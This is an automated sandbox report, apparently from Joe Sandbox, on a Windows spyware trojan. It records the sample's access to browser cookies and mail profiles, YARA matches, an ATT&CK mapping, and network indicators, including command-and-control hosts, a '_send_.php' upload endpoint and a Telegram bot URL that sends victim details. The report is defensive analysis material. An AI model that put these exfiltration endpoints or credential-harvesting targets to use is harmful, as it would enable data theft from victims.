              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: lsc5QN46NH.exeBinary or memory string: WIN_81
              Source: lsc5QN46NH.exeBinary or memory string: WIN_XP
              Source: lsc5QN46NH.exeBinary or memory string: WIN_XPe
              Source: lsc5QN46NH.exeBinary or memory string: WIN_VISTA
              Source: lsc5QN46NH.exeBinary or memory string: WIN_7
              Source: lsc5QN46NH.exeBinary or memory string: WIN_8
              Source: lsc5QN46NH.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00676283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00676283
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00676747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00676747
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts
              2
              Native API
              1
              DLL Side-Loading
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              4
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Valid Accounts
              3
              Obfuscated Files or Information
              Security Account Manager1
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation
              1
              DLL Side-Loading
              NTDS137
              System Information Discovery
              Distributed Component Object Model21
              Input Capture
              3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
              Process Injection
              2
              Valid Accounts
              LSA Secrets241
              Security Software Discovery
              SSH3
              Clipboard Data
              14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
              Access Token Manipulation
              DCSync3
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
              Process Injection
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              lsc5QN46NH.exe31%VirustotalBrowse
              lsc5QN46NH.exe21%ReversingLabsWin32.Trojan.AutoitInject
              lsc5QN46NH.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              104.21.80.1
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  193.122.130.0
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        high
                        http://checkip.dyndns.org/false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:29:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000054DD000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtabsvchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgsvchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/botsvchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://chrome.google.com/webstore?hl=enHsvchost.exe, 00000002.00000002.3934335927.00000000054AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.office.com/lBsvchost.exe, 00000002.00000002.3934335927.00000000054E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.office.com/Hsvchost.exe, 00000002.00000002.3934335927.00000000054DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgsvchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=ensvchost.exe, 00000002.00000002.3934335927.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20asvchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://aborters.duckdns.org:8081svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://anotherarmy.dns.army:8081svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://checkip.dyndns.org/qsvchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://chrome.google.com/webstore?hl=enlsvchost.exe, 00000002.00000002.3934335927.00000000054BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.office.com/lsvchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://chrome.google.com/webstore?hl=enlBsvchost.exe, 00000002.00000002.3934335927.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.org/xml/8.46.123.189$svchost.exe, 00000002.00000002.3934335927.00000000053B8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.orgsvchost.exe, 00000002.00000002.3934335927.000000000538E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsvchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.org/xml/svchost.exe, 00000002.00000002.3934335927.000000000538E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          149.154.167.220
                                                                                          api.telegram.orgUnited Kingdom
                                                                                          62041TELEGRAMRUfalse
                                                                                          193.122.130.0
                                                                                          checkip.dyndns.comUnited States
                                                                                          31898ORACLE-BMC-31898USfalse
                                                                                          104.21.80.1
                                                                                          reallyfreegeoip.orgUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1588171
                                                                                          Start date and time:2025-01-10 22:12:28 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 9m 12s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:7
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:lsc5QN46NH.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:6b5bfda5580a6bd8ec3062f4d33b09c0f91722d824e80ae0cb8d47e8b1b2fcb7.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 53
                                                                                          • Number of non-executed functions: 273
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          TimeTypeDescription
                                                                                          16:13:36API Interceptor10185674x Sleep call for process: svchost.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.220V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                            https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              193.122.130.0y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              checkip.dyndns.comV7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              reallyfreegeoip.orgV7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.48.1
                                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.16.1
                                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.48.1
                                                                                                              SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.64.1
                                                                                                              oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.48.1
                                                                                                              FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.48.1
                                                                                                              xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.64.1
                                                                                                              4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.112.1
                                                                                                              api.telegram.orgV7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
